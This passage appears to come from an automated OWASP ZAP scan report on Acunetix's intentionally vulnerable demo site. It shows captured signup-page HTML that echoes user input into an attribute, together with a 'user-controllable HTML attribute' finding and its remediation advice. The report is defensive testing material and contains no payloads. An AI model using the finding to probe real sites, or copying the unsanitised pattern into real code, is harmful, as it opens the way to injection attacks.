href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	748
Solution	Validate all input and sanitize output it before writing to any HTML attributes.
Reference	http://websecuritytool.codeplex.com/wikipage?title=Checks#user-controlled-html-attribute
Tags	OWASP_2021_A03 OWASP_2017_A01
CWE Id	20
WASC Id	20
Plugin Id	10031

REPORT

Generated on Tue, 13 Dec 2022 23:53:06

Summary of Alerts

Alerts

Passing Rules

Sites

http://testaspnet.vulnweb.com

No Authentication Statistics Found

Alert Detail